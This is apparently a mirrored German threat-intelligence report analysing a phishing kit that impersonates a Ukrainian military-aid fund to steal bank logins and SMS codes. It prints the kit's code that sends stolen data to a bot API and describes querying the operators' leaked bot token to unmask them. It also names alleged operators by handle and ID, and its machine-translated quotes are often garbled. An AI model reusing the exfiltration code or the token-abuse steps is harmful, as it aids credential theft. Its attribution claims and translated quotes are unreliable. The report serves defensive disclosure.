Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / DE / DOPOMOGVOINA EXPOSED

Phishing-Angriffe unter dem Deckmantel militärischer Hilfe: 5 Banken in der Ukraine betroffen

The Enablers Registry·Editorial mirror·/de/dopomogvoina-exposed

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Possibly phishing-Netzwerk im Bereich der Militärhilfe aufgedeckt: 5 Banken ins Visier genommen, Betreiber identifiziert

Die automatisierte Pipeline von THE ENABLERS REGISTRY hat eine Possibly phishing-Aktion, bei der sich die Täter als ukrainische Militärhilfsstiftung ausgaben, innerhalb weniger Minuten vollständig analysiert – von der Domain-Registrierung bis zur Identifizierung der Betreiber.

25. März 2026 THE ENABLERS REGISTRY-Forschung 12 Minuten Lesezeit
Screenshot 1 – Überblick über die Ermittlungen: Das Possibly phishing-Netzwerk „[REDACTED][.]sbs“ hat es auf ukrainische Militärveteranen abgesehen.
5
Banken im Visier
3
Identifizierte Betreiber
6
API-Aufrufe zum Aufheben der Maskierung
2
Parallele Possibly phishing-Projekte
<30
Nur wenige Minuten bis zur vollständigen Analyse
Offenlegung von Sponsoren(Zum Erweitern bitte anklicken)
Wir stellen den offiziellen Sponsor dieser Untersuchung vor
🏆 [REDACTED] 🏆
Am meisten maßgebend Registrar, der arbeitet mit Netcraft zusammen (indem sie das System austricksen) · Offizieller Domain-Anbieter für die FinCEN MSB #31000023456789-Drogenmarktplatz · Anbieter von Mengenrabatten · Engagierter Anhänger der „Ein typischer Betrüger“ VK-Community – hat aber immer noch keinen Anonymitätskurs gekauft
⭐ 1.8
Trustpilot
Bewertung
$200
.ru-Preis
120₽ real
0
Meldungen über Missbrauch
umgesetzt
15,000%
Domäne
Markup
  • Obwohl der Urheber angibt, „Chinese“ (Hongkong) zu sein, stammt er aus Gorlovka, Volksrepublik Donezk. Das chinesische Logo dient rein dekorativen Zwecken – genau wie die Nutzungsbedingungen
  • Wartet Unterstützung für die russische Sprache über VKontakte und [REDACTED], verkauft .ru für 200 Dollar, während IANA #1606 120₽ (~$1.30)
  • Negative Trustpilot-Bewertungen, in denen Folgendes erwähnt wird Domains für Drogenmarktplätze auf mysteriöse Weise verschwinden. Zufall? Auf keinen Fall
  • Ein aktiver Abonnent von „Ein typischer Betrüger“ (Typischer Betrüger) VK-Community – wenn dein Registrar Betrügergruppen folgt, weißt du, wer deren Zielgruppe ist
  • Arbeitet zusammen mit Netcraft gerade genug, um eine Streichung aus dem Verzeichnis zu vermeiden, während die Infrastruktur für Possibly phishing-, Glücksspiel- und Drogen-Domains aufrechterhalten wird

Unterdessen bei „Типичный Мошенник“:

Original (Russisch)
Übersetzt (Englisch)
Ein Versprechen an unseren Sponsor: Wenn dieser Beitrag von „Типичный Мошенник“ Wirklichkeit wird – und nach dem, was wir wissen, ist es nur eine Frage von wenn, nicht falls — Unser gesamtes Team wird sich bei VKontakte registrieren und der Community beitreten. Betrachten Sie das als unseren herzlichen Applaus. 👏

* Dies ist eine Satire. IANA #3765 hat diese Untersuchung nicht gesponsert. Das Unternehmen hat sie jedoch notwendig gemacht, indem es sich über mehr als fünf Tage hinweg geweigert hat, auf unsere Missbrauchsmeldungen zu reagieren. Alle oben genannten Angaben basieren auf öffentlich zugänglichen Informationen und unseren praktischen Erfahrungen. Lesen Sie unseren vollständigen Bericht über IANA #3765

Was THE ENABLERS REGISTRY entdeckt hat

Am 20. März 2026 meldete die automatisierte Pipeline zur Erkennung von Bedrohungen von THE ENABLERS REGISTRY [REDACTED][.]sbs — eine frisch registrierte Domain, auf der eine Possibly phishing-Seite gehostet wird, die sich als „Der Schild des Beschützers“ („Shield of the Defender“), eine vorgetäuschte Stiftung für militärische Hilfe in der Ukraine. Die Website richtet sich an ukrainische Militärveteranen, Kriegsversehrte und die Familien von gefallenen Soldaten und verspricht staatliche finanzielle Unterstützung, während sie gleichzeitig die Zugangsdaten für fünf der größten Banken der Ukraine stiehlt.

Im Folgenden finden Sie eine vollständige Aufschlüsselung aller Erkenntnisse unserer automatisierten Analyse: das Social-Engineering, die technische Infrastruktur, das Echtzeit-Steuerungssystem sowie die Identitäten der Personen, die das System betreiben.

Folgenabschätzung
Die Website richtet sich speziell an die am stärksten gefährdeten Personen: Kriegsveteranen mit PTBS, Familienangehörige von im Einsatz gefallenen Soldaten, die staatliche Hilfe beantragen, sowie verwundete Militärangehörige, die sich in komplexen bürokratischen Systemen zurechtfinden müssen. Jeder gestohlene Zugangsdatensatz kann innerhalb weniger Minuten zur vollständigen Übernahme des Kontos führen.

Abschnitt 1: Der Köder – Die vorgetäuschte Militärhilfsstiftung

Die Domain [REDACTED][.]sbs wurde am 20. März 2026 über [REDACTED], ein Registrar, der nachweislich nur langsam oder gar nicht auf Missbrauchsfälle reagiert. Der .sbs TLD (Side-By-Side) ist eine kostengünstige gTLD, die häufig für temporäre Possibly phishing-Infrastrukturen genutzt wird.

Die Website präsentiert sich als professionelles, regierungsnahes Hilfsportal. Eine ukrainische Flagge füllt die Kopfzeile aus, militärische Bilder verleihen ihr Authentizität, und der Text ist sorgfältig auf Ukrainisch verfasst, wobei die behördliche Ausdrucksweise an seriöse Regierungsprogramme erinnert.

Startseite der Phishing-Website „[REDACTED]“, auf der eine gefälschte Stiftung für Militärhilfe dargestellt wird
Screenshot 5 – Die Startseite der Possibly phishing-Website, die sich als „Щит Захисника“ (Schild des Verteidigers) ausgibt.

Um Glaubwürdigkeit zu schaffen, fälschten die Betreiber einen Statistikzähler, der gut sichtbar auf der Startseite angezeigt wurde:

  • 2.847 Anträge — was bedeutet, dass bereits Tausende Hilfe erhalten haben
  • 47,2 Mio. ₴ ausgeschüttet — eine hohe, aber glaubwürdige Zahl in UAH
  • 19 Programme — was auf eine umfassende, mehrere Programme umfassende Maßnahme hindeutet

Diese Zahlen sind komplett erfunden und fest im Quellcode der Seite hinterlegt, ohne dass eine Verbindung zum Backend besteht. Sie dienen einem einzigen Zweck: als „Social Proof“, um die Bedenken des Opfers zu überwinden.

Abschnitt 2: Die Falle – 5 Banken, ein Ziel

Nach dem Klicken auf „Подати заявку“ (Antrag einreichen) wird dem Opfer ein Bildschirm zur Auswahl einer Bank angezeigt. Als Optionen werden fünf der größten Privatkundenbanken der Ukraine angezeigt, jeweils mit ihrem offiziellen Markenauftritt und Logo. An dieser Stelle wechselt das Social Engineering von emotionaler Manipulation zu technischem Diebstahl.

Auswahlbildschirm für Banken, auf dem 5 ukrainische Banken angezeigt werden
Screenshot 6 – Bildschirm zur Bankauswahl. Jede Option führt zu einer individuellen Abfolge von Angriffen zum Diebstahl von Zugangsdaten.

Die Analyse des JavaScript-Bundles der Website ergab, dass jede Bank über ein einzigartige, mehrstufige Abfolge zum Abgreifen von Anmeldedaten, das genau auf den tatsächlichen Authentifizierungsablauf dieser Bank zugeschnitten ist:

PrivatBank

AnmeldenPasswortPINSMS

monobank

AnmeldenPINSMSE-Mail

Oschadbank

AnmeldenÜberprüfenSMS

PUMB

AnmeldenSMS

Ukrsibbank

AnmeldenPINSMS

Der Ablauf des Angriffs ist bei jeder Bank derselbe:

Gefälschte Spendenseite
Auswahl der Bank
Anmeldung klonen
2FA-Abfang
Kontoübernahme
Gefälschte Anmeldeseite der PrivatBank
Screenshot 7 – Nachgebildete Anmeldeseite der PrivatBank.
Gefälschte PUMB-Anmeldeseite
Screenshot 9 – Geklonte PUMB-Anmeldung.
Ablaufdiagramm eines Angriffs, das die Phishing-Phasen von einer gefälschten Hilfsseite bis zur Kontoübernahme veranschaulicht
Screenshot 10 – Der gesamte Angriffsablauf: von der gefälschten Seite zur Militärhilfe über die Auswahl der Bank bis hin zum Diebstahl von Zugangsdaten und der Übernahme des Kontos.

Der Tech-Stack: React-SPA Frontend bereitgestellt über IANA #1910-CDN, mit einem Express.js Backend zur Exfiltration von Anmeldedaten. Die React-Architektur ermöglicht nahtlose, mehrstufige Formulare, die sich nicht von legitimen Bankoberflächen unterscheiden lassen.

Abschnitt 3: Echtzeit-Bedienersteuerung

Hierbei handelt es sich nicht um einen einfachen Credential-Harvester mit einer statischen Datenbank. Das Possibly phishing-Kit umfasst ein Live-WebSocket-Kontrollfeld die es einem menschlichen Bediener ermöglicht, jede Opfersitzung in Echtzeit zu steuern.

Der WebSocket-Endpunkt unter wss://[REDACTED][.]sbs/ws unterstützt die folgenden Nachrichtentypen:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Dank dieser Echtzeitsteuerung kann der Bediener:

  • Einen Wartezustand erzwingen — die Meldung „Ihre Anfrage wird bearbeitet...“ anzeigen, während sie sich in das echte Bankkonto des Opfers einloggen
  • Zu einem bestimmten Schritt weiterleiten — einen SMS-Code erneut anfordern, falls der erste abgelaufen ist
  • Gefälschte Fehlermeldungen anzeigen — „Ungültiger Code, bitte erneut eingeben“, um mehrere 2FA-Token zu sammeln
  • Individuelle Fragen stellen — während der Sitzung das Geburtsdatum, die Kartennummer oder sonstige zusätzliche Daten abfragen
Was macht das so gefährlich?
Eine Echtzeit-Steuerung durch den Angreifer umgeht zeitbasierte 2FA-Sicherheitsmaßnahmen. Der Angreifer fängt den SMS-Code ab und nutzt ihn innerhalb seines Gültigkeitszeitraums – in der Regel 30 bis 120 Sekunden –, während das Opfer auf eine gefälschte „Verarbeitungs“-Animation starrt.
Formular zur Eingabe der Telefonnummer auf einer gefälschten Bank-Anmeldeseite
Screenshot 8 – Formular zur Eingabe der Telefonnummer, das zum Diebstahl von Zugangsdaten genutzt wird.
WebSocket-basiertes Bedienfeld für den Betreiber
Screenshot 11 – Echtzeit-Bot-Panel des Betreibers zur Steuerung der Sitzungen der Opfer.

Der gesamte Umfang der pro Sitzung gestohlenen Daten: phone, password, PIN, SMS code, card number, date of birth, und email.

Abschnitt 4: Hinter den Kulissen von IANA #1910 – Zwei Projekte, ein Server

Das IANA #1910-Proxying verbirgt den Ursprungsserver, doch die Infrastruktur-Analyse-Pipeline von THE ENABLERS REGISTRY hat die tatsächliche Ursprungs-IP ermittelt: 45.131.214[.]148, gehostet bei RapidSeedbox / LeaseWeb in den Niederlanden.

Ein entscheidendes Detail: [REDACTED][.]sbs wird über IANA #1910, wobei die IP-Adresse des Absenders verborgen bleibt. Unser System verfolgt jedoch auch hlpforvpeople[.]sbs — eine verwandte Domain, die über denselben IANA #3765-Registrar registriert wurde und übereinstimmende Muster aufweist. Diese Domain lautet NICHT hinter IANA #1910, wodurch die IP-Adresse des Absenders direkt offengelegt wird: 45.131.214[.]148.

Eine direkte Verbindung zu dieser IP herstellen — ohne einen Host Kopfzeile – enthüllte etwas Unerwartetes: ein eine völlig andere Possibly phishing-Seite. Anstelle von Militärhilfe für die Ukraine wurde der Standard-Vhost bereitgestellt „HealthCare ID“, eine Possibly phishing-Aktion im Zusammenhang mit einer indonesischen Krankenversicherung. Derselbe Server, völlig andere Opfer, ein völlig anderes Land.

Derselbe Server, dieselben Täter, andere Opfer
  • Projekt 1: Militärhilfe für die Ukraine → Diebstahl von Bankzugangsdaten von Veteranen
  • Projekt 2: Indonesische Krankenversicherung → stiehlt Gesundheitsdaten von Bürgern
  • Derselbe Express.js-Stack, dasselbe WebSocket-Echtzeit-Kontrollpanel
  • Dieselbe BT-Panel (宝塔)-Serververwaltungsoberfläche
  • C2-Domäne des zweiten Projekts: [REDACTED] — ein bekanntes Possibly phishing-Panel, das in der Bedrohungsdatenbank von THE ENABLERS REGISTRY identifiziert wurde
  • Kommentare auf Russisch im Quellcode des indonesischen Projekts bestätigen dieselben CIS-basierten Entwickler
Zwei Phishing-Projekte, die auf demselben Server laufen – ukrainische Militärhilfe und indonesische Krankenversicherung
Screenshot 12 – Zwei parallele Possibly phishing-Aktionen, die denselben Ursprungsserver nutzen: Militärhilfe für die Ukraine ([REDACTED]) und indonesische Krankenversicherung (HealthCare ID).

Die indonesische Possibly phishing-Vorlage ist eine bekanntes Kit, das in der Threat-Intelligence-Datenbank von THE ENABLERS REGISTRY erfasst wurde. Wir haben festgestellt, dass Varianten genau dieser Vorlage in ganz Südostasien eingesetzt werden – gezielt gegen indonesische, thailändische und vietnamesische Finanzinstitute. Die Betreiber tauschen einfach die länderspezifischen Vorlagen aus, während sie dieselbe Backend-Infrastruktur weiterverwenden.

Wahllose Kriminelle
So sieht die Realität moderner Possibly phishing-Angriffe aus: Den Betreibern ist es egal, wen sie bestehlen. Ukrainische Kriegsveteranen, die um militärische Hilfe bitten, indonesische Arbeitnehmer, die eine Krankenversicherung abschließen wollen – das Ziel ändert sich je nachdem, welche Vorlage den größten Umsatz bringt. Dieselben russischsprachigen Betreiber führen beide Kampagnen gleichzeitig vom selben Server aus durch und wechseln zwischen Opfern in verschiedenen Ländern hin und her, als würden sie Fernsehkanäle umschalten. Heute sind es ukrainische Banken. Morgen könnten es israelische Banken sein – wie Bonya bereits im März 2026 angefragt hat.

Abschnitt 5: Die „config.json“-Datei, die alles offenlegte

So hat eine einzige falsch konfigurierte Datei den gesamten Vorgang zum Scheitern gebracht – Schritt für Schritt.

Nachdem das zweite Projekt des Ursprungsservers identifiziert worden war, hat THE ENABLERS REGISTRY’s JS-Analysator — unser automatisiertes JavaScript-Analyse-Tool — wurde auf das Bundle der indonesischen Possibly phishing-Website unter https://45.131.214[.]148/assets/index-ZMQxHb_h.js. Der Analysator hat alle API-Endpunkte, externen URLs und Konfigurationspfade aus der 335 KB großen JavaScript-Datei extrahiert. Zu den Ergebnissen zählen:

  • Fünf API-Endpunkte unter [REDACTED] — das C2-Panel zur Überprüfung von Zugangsdaten
  • Eine WebSocket-Verbindung zu wss://rezervtemka[.]cc
  • Integration des Facebook-Pixels zur Nachverfolgung von Opfern
  • Ein Verweis auf /config.json — wird zur Laufzeit für die Konfiguration des [REDACTED]-Bots geladen

Diesem Hinweis folgend haben wir /config.json von der Ursprungs-IP. Auf die Datei konnte ohne jegliche Authentifizierung zugegriffen werden – sie befand sich im Webroot und war für jeden lesbar:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.[REDACTED].org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

Die /config.json Auf die Datei konnte direkt von der Ursprungs-IP aus zugegriffen werden — Keine Authentifizierung, keine Zugriffskontrolle, nur eine einfache JSON-Datei im Webroot-Verzeichnis:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Ein [REDACTED]-Bot-Token dient sowohl als Benutzername als auch als Passwort. Wer das Token besitzt, kann API-Aufrufe als dieser Bot durchführen. Die Betreiber haben ihr Token in einer öffentlich zugänglichen Datei hinterlegt. Sechs API-Aufrufe später hatten wir alles:

getMe — Bot-Identität: „MonettiCRM“ (@MonettiCRM_bot)
getChat(chat_id) — Gruppenname: „Idr-Karte“ mit einem aktiven Einladungslink
getChatAdministrators — 3 Administratoren, darunter der Gründer der Gruppe
getChat(creator_id) — Urheber: @monettiescobar, [REDACTED] Premium, Unternehmensprofil, Zeitzone UTC+3
getChat(admin2_id) — Zweiter Administrator: leeres Profil, vermutetes Zweitkonto
getChatMemberCount — Insgesamt 5 Mitglieder in der Betreibergruppe
OSINT-Kette, die 6 [REDACTED]-API-Aufrufe von „config.json“ bis zur vollständigen Identifizierung des Betreibers zeigt
Screenshot 13 – Die vollständige OSINT-Kette: von der offengelegten config.json bis zur vollständigen Identifizierung des Betreibers in 6 API-Aufrufen.

Von einer einzigen falsch konfigurierten Datei bis hin zur vollständigen Identifizierung der Betreiber in sechs HTTP-Anfragen. Keine Exploits, kein unbefugter Zugriff – lediglich Standard-Aufrufe der [REDACTED]-Bot-API unter Verwendung eines Tokens, das die Betreiber selbst offen zugänglich gelassen hatten.

Abschnitt 6: Die Betreiber

Ein Hinweis zur kriminellen Kreativität

Was nun folgt, ist ein Paradebeispiel für schlechte Alias-Wahl. Wir haben MONETTI ESCOBAR — denn nichts strahlt mehr „Unauffälligkeit“ aus, als sich nach dem berühmtesten Drogenbaron der Geschichte zu benennen. Und dann ist da noch Bonya, auch bekannt als PapaZakonVor (wörtlich „Papa-Dieb-nach-dem-Gesetz“ – eine vermeintliche Anspielung auf die russische kriminelle Hierarchie), Boa, und bubullikk. Und schließlich Devoys, dessen Benutzername @devosus Das klingt verdächtig nach „dev ops us“ – ein Entwickler, der seine Berufsbezeichnung in seinen Benutzernamen aufgenommen hat. Das sind die Leute, die dachten, sie könnten automatisierte Bedrohungsanalysen überlisten. Spoiler: Das konnten sie nicht.

[REDACTED]-Betreibergruppe „Idr card“ über Bot-Token entlarvt
Screenshot 14 – Die [REDACTED]-Betreibergruppe „Idr card“, die durch das durchgesickerte Bot-Token aufgedeckt wurde.
MONETTI ESCOBAR [REDACTED]-Avatar
Inhaber / Gründer
MONETTI ESCOBAR
@monettiescobar
[REDACTED]-ID: 8135223234
[REDACTED] Premium, Unternehmensprofil
Zeitzone: UTC+3 (GUS-Region)
10 öffentliche Nachrichten – strenge OPSEC
TraFFeeQ-ChatMedusa Google AdsDeepfakes-Kanal
Bonya-Telegram-Avatar
Disponent / Verkehrsleitung
Bonya
@BoaCC159
[REDACTED]-ID: 6242202706
Auch bekannt als: PapaZakonVor, Boa, bubullikk
261 Beiträge in 12 Gruppen
DC2 – Amsterdam, NL
CryptoGrabSTYX-MarktRaven CCEMPIRE-CHATPhoenix-Lösung
Entwickler / Programmierer
Devoys
@devosus
[REDACTED]-ID: 8213612730
Entwickler von Possibly phishing-Kits – die Betreiber bezeichnen ihn als Programmierer
Bei Feststellung einer Sicherheitslücke wurde dazu aufgefordert, „über die Verteidigung nachzudenken“
Von vornherein auf einen minimalen öffentlichen Fußabdruck ausgelegt
Griff @devosus ≈ „dev ops us“ – Berufsbezeichnung als Benutzername
Entwickler von BausätzenInfrastrukturSicherheit

MONETTI ESCOBAR – Der Boss

MONETTI hält sich an strenge Sicherheitsvorschriften – nur 10 öffentliche Nachrichten auf zwei Gruppen verteilt. Aber die Gruppen sprechen für sich: TraFFeeQ-Chat (Traffic-Arbitrage zu betrügerischen Zwecken), Medusa Google Ads (Black-Hat-Google-Ads) sowie ein Deepfakes-Kanal. In seinem [REDACTED]-Unternehmensprofil steht „Есть предложение“ („Ich habe einen Vorschlag“) — offene Werbung für Dienstleistungen. Die Zeitzone UTC+3 (entspricht Moskau/Minsk/Kiew) und die Geschäftszeiten rund um die Uhr bestätigen, dass es sich um einen in der GUS ansässigen Betrieb handelt, der rund um die Uhr im Einsatz ist.

Bonya – Der Unachtsame

Im Gegensatz zu MONETTIs sorgfältiger OPSEC ist Bonya (früheres Pseudonym: PapaZakonVor — sinngemäß „DaddyThiefByLaw“) hinterließ eine riesige digitale Spur — 261 Nachrichten in 12 Untergrundgruppen. Sein Chatverlauf liest sich wie ein krimineller Lebenslauf:

Bonya in eigenen Worten (aus dem Russischen übersetzt)
  • „Sicherungen für 2,0 A“„Nur Possibly phishing für [Banksicherheit] 2.0“ — Erörterung der Kompatibilität von Possibly phishing-Kits mit neueren Sicherheitssystemen von Banken
  • „Gute Drops sind schwer zu finden“„Gute Geldkuriere sind schwer zu finden“ — Komplizen für Geldabhebungen suchen
  • „Komm doch ins Kulturzentrum und arbeite bei mir.“„Komm doch in mein Callcenter arbeiten“ — Personalbeschaffung für Telefonisten
  • „Gibt es hier Leute, die schon einmal mit israelischen Banken zusammengearbeitet haben?“„Gibt es hier jemanden, der schon einmal mit israelischen Banken zusammengearbeitet hat?“ — Ausweitung auf neue Zielgruppen (März 2026)
  • „Ich sehe da nicht wirklich irgendwelche Logos auf der Vorderseite.“„Ich sehe nicht viele Finanzprotokolle“ — Diskussion über die Qualität gestohlener Zugangsdaten
  • „Wenn 1 Proxy 1–2 Bank-Strom“„Ein Bevollmächtigter für nur 1–2 Banken“ — Diskussion über operative Sicherheit im Zusammenhang mit Bankbetrug
  • „Der Geldautomat hat ihre Karte eingezogen.“„Ihre Karte wurde vom Geldautomaten eingezogen.“ — Ein Geldkurier hat ihnen ₴60.000 gestohlen und behauptet, der Geldautomat habe die Karte verschluckt. Selbst Kriminelle werden von ihren eigenen Komplizen betrogen.

Seine Gruppenzugehörigkeiten vermitteln ein umfassendes Bild: CryptoGrab (Krypto-Wallet-Leerer), STYX-Markt (Untergrundmarktplatz für gestohlene Daten), Raven CC-Prüfprogramm (Tools zur Kreditkartenüberprüfung), EMPIRE-CHAT und Phoenix-Lösung (Koordination von Betrugsdelikten). Es handelt sich hier nicht um einen Einmaltäter – sondern um jemanden, der fest im Ökosystem der Cyberkriminalität verankert ist.

Devoys – Der Entwickler

Das technische Rückgrat der Operation. Von vornherein auf minimale öffentliche Präsenz ausgelegt – als die Gruppe angegriffen wurde, wandte sich Bonya ausdrücklich an ihn: „@devosus, denk mal über die Verteidigung nach, bevor uns jemand den Arsch aufreißt.“„@devosus, denk mal an die Verteidigung, bevor wir ordentlich eins auf die Mütze bekommen.“ Seine sarkastische Reaktion auf den Verstoß — „Wenn bei Interpol“ („Wann sollte man interpolieren?“) – lässt vermuten, dass dies nicht ihr erster Beinaheunfall ist.

Verhaltensanalyse: 261 entschlüsselte Nachrichten

Die OSINT-Pipeline von THE ENABLERS REGISTRY hat folgende Informationen gesammelt und übersetzt alle 261 öffentlichen Nachrichten von Bonya aus 12 unterirdischen [REDACTED]-Gruppen (Juni 2024 – März 2026). Maschinelle Übersetzung über die DeepL-API mit manueller Korrektur anhand des Kontexts. Die Nachrichten geben Aufschluss über ein vollständiges operatives Profil – im Folgenden nach Art der kriminellen Aktivitäten kategorisiert.

Nachrichtenverteilung: 261 Nachrichten in 12 Gruppen
  • 💬ONE|Chat — 91 Nachrichten (Koordination bei Betrugsfällen)
  • Aktuelles/Verifizierungen — 37 Nachrichten (Betrugsversuche unter dem Vorwand der Verifizierung)
  • Rolex | Allgemeiner Chat — 28 Nachrichten (Carding)
  • EMPIRE-CHAT — 24 Nachrichten (Schwarzmarkt)
  • Fbstore — 23 Nachrichten (Traffic-Arbitrage)
  • FB-DOC — 22 Nachrichten (Werbe-Betrug)
  • Phoenix-Lösung — 17 Nachrichten (Bankbetrug)
  • CryptoGrab — 11 Nachrichten (Krypto-Draining)
  • STYX-Markt — 2 Nachrichten (Untergrund-Marktplatz)
  • Raven CC-Prüfprogramm — 2 Nachrichten (Kartenprüfung)

Bankbetrug und Possibly phishing

💬ONE|ChatMärz 2025
„Hier gibt es nur 2,0 Phish.“
Und hier sind die Fische mit einer Stromstärke von 2,0
Erörterung der Kompatibilität von Possibly phishing-Kits mit neueren Sicherheitsprotokollen von Banken
💬ONE|ChatMärz 2025
„Alter, hier wird nichts auf Phish verkauft, hier wird mit Phish bezahlt.“
Alter, hier wird nichts auf Fisch verkauft, hier gibt’s Fisch nur gegen Bezahlung.
Unterscheidung zwischen „Possibly phishing zum Zweck des Verkaufs“ und „Possibly phishing zum Zweck des direkten Diebstahls“
Phoenix-LösungMärz 2026
„Gibt es hier jemanden, der schon einmal mit Banken in Israel zusammengearbeitet hat?“
Gibt es hier Leute, die schon einmal mit israelischen Banken zusammengearbeitet haben?
Ausweitung der Geschäftstätigkeit auf den israelischen Bankensektor – 5 Tage vor unserer Untersuchung
Rolex | Allgemeiner ChatSeptember 2024
„Bei nur einem Bevollmächtigten nur 1–2 Banken“
Wenn 1 Proxy 1–2 Stromversorgungen hat
Sicherheitsmaßnahmen gegen Betrug bei mehreren Banken: ein Proxy pro 1–2 Banken, um eine Entdeckung zu vermeiden
Rolex | Allgemeiner ChatSeptember 2024
„Da ist nicht viel in Sachen Finanzprotokolle zu sehen“
Ich sehe da nicht wirklich irgendwelche Logos auf der Vorderseite.
Kritik an der Qualität gestohlener Bankzugangsdaten auf Schwarzmärkten

Geldkurier & Auszahlung

💬ONE|ChatMärz 2025
„Gute Drops sind schwer zu finden“
Gute Drops sind schwer zu finden.
„Drops“ = Geldkurier, die gestohlene Gelder in Bargeld umtauschen. Sie beklagen sich über Schwierigkeiten bei der Anwerbung.
💬ONE|ChatMärz 2025
„Komm doch in mein Callcenter arbeiten“
Komm doch ins Kulturzentrum und arbeite bei mir
Aktive Anwerbung von Mitarbeitern für einen betrügerischen Callcenter-Betrieb
AktuellesJuni 2024
„Uns wurden 60.000 gestohlen“
Bei uns wurden 60k gestohlen
Ein Geldkurier hat den Betrügern selbst 60.000 ₴ gestohlen. Ironische Gerechtigkeit.
AktuellesJuni 2024
„Wie zum Teufel konnte der Geldautomat die Karte verschlucken?“
Wie zum Teufel konnte der Geldautomat die Karte verschlucken?
Der Mittelsmann behauptete, der Geldautomat habe die Karte „verschluckt“, um das gestohlene Geld zu behalten. Betrüger, die andere Betrüger betrügen.
AktuellesJuni 2024
„Sie hat es an uns überwiesen, aber dann fehlte uns die Hauptüberweisung, um das Geld weiterzuleiten.“
Sie hat es auf uns abgewälzt, aber wir hatten zu diesem Zeitpunkt nicht den nötigen Betrag, um das Geld zu überweisen.
Beschreibung der Geldauszahlungskette: Opfer → Zwischenkonto → Hauptgeldkurier

Traffic-Betrug und Anzeigenmissbrauch

EMPIRE-CHATMärz 2026
„Ich nutze Google nicht, nur Facebook“
Na ja, ich arbeite nicht mit Google, sondern nur mit Facebook.
Spezialisiert auf Facebook-Werbe-Betrug – Leitet Besucher auf Possibly phishing-Seiten um
FB-DOCFebruar 2026
„Ohne einen Bürgen würde ich auch keinen Prozentsatz der Werbeausgaben bereitstellen.“
Ich würde auch nicht nach einem Prozentsatz der Ausgaben zahlen, ohne dass es eine Garantie gibt.
Aushandlung von Zahlungsbedingungen für betrügerische Facebook-Werbekampagnen
CryptoGrabJanuar 2025
„Ich habe AML auf Facebook ausprobiert, um den amerikanischen Markt anzusprechen – konnte online aber keine guten Einstellungen finden.“
Ich habe versucht, auf Facebook nach „AML“ zu suchen, um mehr über Amerika zu erfahren, habe aber im Internet keine vernünftigen, auch nicht älteren Links dazu gefunden.
Versuch, mithilfe von Facebook-Anzeigen Betrugsmaschen zur Bekämpfung der Geldwäsche zu betreiben, die auf Opfer in den USA abzielen
Psychologisches Profil: Bonya

Der Korpus mit 261 Nachrichten zeigt eine Cyberkrimineller der mittleren Ebene mit vielfältigen Aktivitäten: Possibly phishing im Bankensektor, Geldkurier-Netzwerke, Facebook-Werbe-Betrug, Abzug von Kryptowährungen und Kreditkartenbetrug. Wesentliche Merkmale:

  • Sachliche Nachlässigkeit — 261 Beiträge in öffentlichen Gruppen über ein einziges Konto. Mehrere Aliasnamen (PapaZakonVor → Boa → Bonya) deuten darauf hin, dass man sich der OPSEC bewusst war, diese jedoch nicht befolgt hat.
  • Einstellung zur Personalbeschaffung — lädt Menschen aktiv dazu ein, „in meinem Callcenter zu arbeiten“, und verkauft betriebliches Wissen gegen Bargeld
  • Gleichgültigkeit gegenüber den Opfern — erörtert ukrainische, europäische, israelische und amerikanische Ziele mit gleicher Distanz. Die Geografie ist lediglich eine Variable in der Betrugsgleichung
  • Vertrauensprobleme — wurde von seinem eigenen Geldkurier um 60.000 ₴ betrogen. Das spiegelt auf ironische Weise das Misstrauen wider, das er bei seinen Opfern schürt.
  • Expansionsgetrieben — noch im März 2026 suchte das Unternehmen aktiv nach neuen Bankenmärkten (Israel), was darauf hindeutet, dass das ukrainische Possibly phishing-Projekt nur eine von vielen gleichzeitig laufenden Operationen ist
Bonya: Vollständiges Nachrichtenprotokoll (253 Nachrichten in 12 Gruppen)
Bonya (@BoaCC159) – Vollständiger übersetzter Nachrichtenverlauf
-- Phoenix Solution (16 Beiträge) --
B
Bonya2026-03-17 14:22
Gibt es hier jemanden, der schon einmal mit Banken in Israel zusammengearbeitet hat?Gibt es hier Leute, die schon einmal mit israelischen Banken zusammengearbeitet haben?
B
Bonya2026-03-17 14:22
und arbeitet dabei auch ganz leise.Wir arbeiten auch ganz leise
B
Bonya2026-03-17 14:17
Wie läuft's?Wie geht’s?
B
Bonya2026-03-17 14:17
Hallo zusammenHallo zusammen
B
Bonya2026-03-15 19:02
Na ja, jetzt ist so ziemlich alles wieder in Ordnung.Na ja, im Großen und Ganzen haben wir alles schon geregelt.
B
Bonya2026-03-15 19:02
Na ja, das ist schon ein bisschen mühsamNa ja, wir haben ein bisschen Ärger verursacht
B
Bonya2026-03-15 19:01
Ja, ich hab auch viel im Stillen gearbeitet, es ist alles im Arsch.Ja, auch bei der stillen Arbeit habe ich es echt satt
B
Bonya2026-03-15 19:00
Wie war dein freier Tag?Wie verlief das Wochenende?
B
Bonya2026-03-15 19:00
Ihr alle.Für alle
B
Bonya2026-03-14 14:29
Er ist jetzt nicht mehr so anonym, da ja jeder weiß, dass es Marik ist.So anonym ist er gar nicht mehr, denn alle wissen ja, wer Marik ist.
B
Bonya2026-03-14 14:24
WiedergeborenWiedergeboren
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Ahahahahahahahah
B
Bonya2026-03-14 14:23
Ich war enttäuscht, als ich sah, dass der Chatraum verschwunden war.Ich war richtig enttäuscht, als ich gesehen habe, dass der Chat verschwunden war.
B
Bonya2026-03-14 14:22
Ich dachte schon, ich würde dich nie finden.Ich dachte schon, ich würde euch nicht mehr finden
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
ScheißeScheiße
-- 👨‍⚕️ FB-DOC — Chat zum Thema Traffic-Arbitrage (21 Nachrichten) --
B
